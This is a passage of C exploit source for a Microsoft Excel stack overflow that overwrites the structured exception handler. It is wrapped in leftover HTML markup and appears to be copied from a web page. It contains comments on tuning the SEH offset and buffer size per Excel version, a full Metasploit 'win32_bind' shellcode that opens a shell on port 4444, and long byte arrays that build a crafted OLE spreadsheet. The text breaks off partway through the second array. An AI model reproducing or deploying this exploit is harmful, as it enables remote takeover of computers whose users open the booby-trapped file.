//SEH offset from the start of our buffer<br /> //For win2k it maybe +24<br /> //Check it in your debugger<br /><br />int buff_size = 0x152E; //approximate your buffer size to fill the<br />stack beyond SEH<br /> //it is variant for different Excel versions<br /> //so again consult your debugger<br /><br />// win32_bind - Shellcode , port = 4444 , thanks to </span><a href="http://metasploit.com/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)"><span style="" lang="EN-GB">http://metasploit.com</span></a><span style="" lang="EN-GB"><br />unsigned char shellcode[] =<br />"\xd9\xee\xd9\x74\x24\xf4\x5b<wbr>\x31\xc9\xb1\x5e\x81\x73\x17<wbr>\x4f\x85"<br />"\x2f\x98\x83\xeb\xfc\xe2\xf4<wbr>\xb3\x6d\x79\x98\x4f\x85\x7c<wbr>\xcd\x19"<br />"\xd2\xa4\xf4\x6b\x9d\xa4\xdd<wbr>\x73\x0e\x7b\x9d\x37\x84\xc5<wbr>\x13\x05"<br />"\x9d\xa4\xc2\x6f\x84\xc4\x7b<wbr>\x7d\xcc\xa4\xac\xc4\x84\xc1<wbr>\xa9\xb0"<br />"\x79\x1e\x58\xe3\xbd\xcf\xec<wbr>\x48\x44\xe0\x95\x4e\x42\xc4<wbr>\x6a\x74"<br />"\xf9\x0b\x8c\x3a\x64\xa4\xc2<wbr>\x6b\x84\xc4\xfe\xc4\x89\x64<wbr>\x13\x15"<br />"\x99\x2e\x73\xc4\x81\xa4\x99<wbr>\xa7\x6e\x2d\xa9\x8f\xda\x71<wbr>\xc5\x14"<br />"\x47\x27\x98\x11\xef\x1f\xc1<wbr>\x2b\x0e\x36\x13\x14\x89\xa4<wbr>\xc3\x53"<br />"\x0e\x34\x13\x14\x8d\x7c\xf0<wbr>\xc1\xcb\x21\x74\xb0\x53\xa6<wbr>\x5f\xce"<br />"\x69\x2f\x99\x4f\x85\x78\xce<wbr>\x1c\x0c\xca\x70\x68\x85\x2f<wbr>\x98\xdf"<br />"\x84\x2f\x98\xf9\x9c\x37\x7f<wbr>\xeb\x9c\x5f\x71\xaa\xcc\xa9<wbr>\xd1\xeb"<br />"\x9f\x5f\x5f\xeb\x28\x01\x71<wbr>\x96\x8c\xda\x35\x84\x68\xd3<wbr>\xa3\x18"<br />"\xd6\x1d\xc7\x7c\xb7\x2f\xc3<wbr>\xc2\xce\x0f\xc9\xb0\x52\xa6<wbr>\x47\xc6"<br />"\x46\xa2\xed\x5b\xef\x28\xc1<wbr>\x1e\xd6\xd0\xac\xc0\x7a\x7a<wbr>\x9c\x16"<br />"\x0c\x2b\x16\xad\x77\x04\xbf<wbr>\x1b\x7a\x18\x67\x1a\xb5\x1e<wbr>\x58\x1f"<br />"\xd5\x7f\xc8\x0f\xd5\x6f\xc8<wbr>\xb0\xd0\x03\x11\x88\xb4\xf4<wbr>\xcb\x1c"<br />"\xed\x2d\x98\x5e\xd9\xa6\x78<wbr>\x25\x95\x7f\xcf\xb0\xd0\x0b<wbr>\xcb\x18"<br />"\x7a\x7a\xb0\x1c\xd1\x78\x67<wbr>\x1a\xa5\xa6\x5f\x27\xc6\x62<wbr>\xdc\x4f"<br />"\x0c\xcc\x1f\xb5\xb4\xef\x15<wbr>\x33\xa1\x83\xf2\x5a\xdc\xdc<wbr>\x33\xc8"<br />"\x7f\xac\x74\x1b\x43\x6b\xbc<wbr>\x5f\xc1\x49\x5f\x0b\xa1\x13<wbr>\x99\x4e"<br />"\x0c\x53\xbc\x07\x0c\x53\xbc<wbr>\x03\x0c\x53\xbc\x1f\x08\x6b<wbr>\xbc\x5f"<br />"\xd1\x7f\xc9\x1e\xd4\x6e\xc9<wbr>\x06\xd4\x7e\xcb\x1e\x7a\x5a<wbr>\x98\x27"<br />"\xf7\xd1\x2b\x59\x7a\x7a\x9c<wbr>\xb0\x55\xa6\x7e\xb0\xf0\x2f<wbr>\xf0\xe2"<br />"\x5c\x2a\x56\xb0\xd0\x2b\x11<wbr>\x8c\xef\xd0\x67\x79\x7a\xfc<wbr>\x67\x3a"<br />"\x85\x47\x68\xc5\x81\x70\x67<wbr>\x1a\x81\x1e\x43\x1c\x7a\xff<wbr>\x98";<br /><br />//excel sheet formatting data bytes<br /><br />unsigned char stream1[] = {<br /> 0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x00, 0x03,<br />0x00, 0xFE, 0xFF, 0x09, 0x00,<br /> 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x01, 0x00, 0x00, 0x00,<br /> 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,<br />0x00, 0xFE, 0xFF, 0xFF, 0xFF,<br /> 0x00, 0x00, 0x00, 0x00, 0xFE, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,<br />0x00, 0x0F, 0x00, 0x00, 0x00,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x05, 0x00, 0xBB, 0x0D, 0xCC,<br />0x07, 0x41, 0x00, 0x00, 0x00,<br /> 0x06, 0x00, 0x00, 0x00, 0x42, 0x00, 0x02, 0x00, 0xE4, 0x04, 0x8D,<br />0x00, 0x02, 0x00, 0x00, 0x00,<br /> 0x3D, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5C, 0x35, 0xED,<br />0x30, 0x38, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x01, 0x00, 0x58, 0x02, 0x22, 0x00, 0x02, 0x00, 0x00,<br />0x00, 0x31, 0x00, 0x15, 0x00,<br /> 0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x05, 0x00,<br /> 0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00, 0x15, 0x00, 0xC8, 0x00,<br />0x00, 0x00, 0xFF, 0x7F, 0x90,<br /> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x41, 0x72,<br />0x69, 0x61, 0x6C, 0x31, 0x00,<br /> 0x15, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x05, 0x00, 0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00, 0x15, 0x00,<br />0xC8, 0x00, 0x00, 0x00, 0xFF,<br /> 0x7F, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00,<br />0x41, 0x72, 0x69, 0x61, 0x6C,<br /> 0x31, 0x00, 0x16, 0x00, 0xA0, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90,<br />0x01, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x06, 0x00, 0x54, 0x61, 0x68, 0x6F, 0x6D, 0x61, 0x31,<br />0x00, 0x15, 0x00, 0xC8, 0x00,<br /> 0x00, 0x00, 0x0C, 0x00, 0x90, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,<br />0x00, 0x05, 0x00, 0x41, 0x72,<br /> 0x69, 0x61, 0x6C, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2B, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x29, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF8, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2C, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x00,<br /> 0x00, 0x2A, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF8, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x09, 0x00,<br />0xF5, 0xFF, 0x20, 0x00, 0x00,<br /> 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20,<br />0xE0, 0x00, 0x14, 0x00, 0x06,<br /> 0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x08, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0xC0, 0x20, 0x93, 0x02, 0x04, 0x00, 0x10, 0x80, 0x03, 0xFF,<br />0x93, 0x02, 0x04, 0x00, 0x11,<br /> 0x80, 0x06, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x12, 0x80, 0x04, 0xFF,<br />0x93, 0x02, 0x04, 0x00, 0x13,<br /> 0x80, 0x07, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x00, 0x80, 0x00, 0xFF,<br />0x93, 0x02, 0x04, 0x00, 0x14,<br /> 0x80, 0x05, 0xFF, 0x92, 0x00, 0xE2, 0x00, 0x38, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0xFF, 0xFF, 0xFF,<br /> 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00,<br />0xFF, 0x00, 0xFF, 0xFF, 0x00,<br /> 0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x80, 0x00,<br />0x00, 0x00, 0x00, 0x80, 0x00,<br /> 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x80, 0x00,<br />0x80, 0x00, 0x00, 0x80, 0x80,<br /> 0x00, 0xC0, 0xC0, 0xC0, 0x00, 0x80, 0x80, 0x80, 0x00, 0x99, 0x99,<br />0xFF, 0x00, 0x99, 0x33, 0x66,<br /> 0x00, 0xFF, 0xFF, 0xCC, 0x00, 0xCC, 0xFF, 0xFF, 0x00, 0x66, 0x00,<br />0x66, 0x00, 0xFF, 0x80, 0x80,<br /> 0x00, 0x00, 0x66, 0xCC, 0x00, 0xCC, 0xCC, 0xFF, 0x00, 0x00, 0x00,<br />0x80, 0x00, 0xFF, 0x00, 0xFF,<br /> 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x80, 0x00,<br />0x80, 0x00, 0x80, 0x00, 0x00,<br /> 0x00, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0xCC,<br />0xFF, 0x00, 0xCC, 0xFF, 0xFF,<br /> 0x00, 0xCC, 0xFF, 0xCC, 0x00, 0xFF, 0xFF, 0x99, 0x00, 0x99, 0xCC,<br />0xFF, 0x00, 0xFF, 0x99, 0xCC,<br /> 0x00, 0xCC, 0x99, 0xFF, 0x00, 0xFF, 0xCC, 0x99, 0x00, 0x33, 0x66,<br />0xFF, 0x00, 0x33, 0xCC, 0xCC,<br /> 0x00, 0x99, 0xCC, 0x00, 0x00, 0xFF, 0xCC, 0x00, 0x00, 0xFF, 0x99,<br />0x00, 0x00, 0xFF, 0x66, 0x00,<br /> 0x00, 0x66, 0x66, 0x99, 0x00, 0x96, 0x96, 0x96, 0x00, 0x00, 0x33,<br />0x66, 0x00, 0x33, 0x99, 0x66,<br /> 0x00, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x00, 0x99, 0x33,<br />0x00, 0x00, 0x99, 0x33, 0x66,<br /> 0x00, 0x33, 0x33, 0x99, 0x00, 0x33, 0x33, 0x33, 0x00, 0x85, 0x00,<br />0x0E, 0x00, 0x22, 0x04, 0x00,<br /> 0x00, 0x00, 0x00, 0x06, 0x00, 0x53, 0x68, 0x65, 0x65, 0x74, 0x31,<br />0xFC, 0x00, 0x0F, 0x00, 0x01,<br /> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C,<br />0x49, 0x4E, 0x4B, 0x0A, 0x00,<br /> 0x00, 0x00, 0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x10, 0x00, 0xBB,<br />0x0D, 0xCC, 0x07, 0x41, 0x00,<br /> 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x02, 0x00, 0x00,<br />0x00, 0x2B, 0x00, 0x02, 0x00,<br /> 0x01, 0x00, 0x82, 0x00, 0x02, 0x00, 0x00, 0x00, 0x80, 0x00, 0x08,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x25, 0x02, 0x04, 0x00, 0x00, 0x00, 0xFF,<br />0x00, 0x81, 0x00, 0x02, 0x00,<br /> 0xC1, 0x04, 0x14, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00,<br />0x03, 0x00, 0x00, 0x00, 0x00,<br /> 0x83, 0x00, 0x02, 0x00, 0x00, 0x00, 0x84, 0x00, 0x02, 0x00, 0x00,<br />0x00, 0x26, 0x00, 0x08, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x3F, 0x27, 0x00, 0x08,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0xE8, 0x3F, 0x28, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0xF0, 0x3F,<br /> 0x29, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0,<br />0x3F, 0xA1, 0x00, 0x22, 0x00,<br /> 0x00, 0x00, 0x64, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,<br />0x00, 0x58, 0x02, 0x58, 0x02,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x3F, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0xE0, 0x3F,<br /> 0x01, 0x00, 0x55, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x02, 0x0E,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD,<br />0x00, 0x0A, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB8, 0x01, 0x62,<br />0x15, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0xD0, 0xC9, 0xEA, 0x79, 0xF9, 0xBA, 0xCE,<br />0x11, 0x8C, 0x82, 0x00, 0xAA,<br /> 0x00, 0x4B, 0xA9, 0x0B, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00,<br />0x00, 0xE0, 0xC9, 0xEA, 0x79,<br /> 0xF9, 0xBA, 0xCE, 0x11, 0x8C, 0x82, 0x00, 0xAA, 0x00, 0x4B, 0xA9, 0x0B<br />};<br /><br />unsigned char stream2[] = {<br /> 0x00, 0x00, 0x00, 0x3E, 0x02, 0x12, 0x00, 0xB6, 0x06, 0x00, 0x00,<br />0x00, 0x00, 0x40, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1D, 0x00,<br />0x0F, 0x00, 0x03, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x0A, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x6F, 0x00, 0x6F, 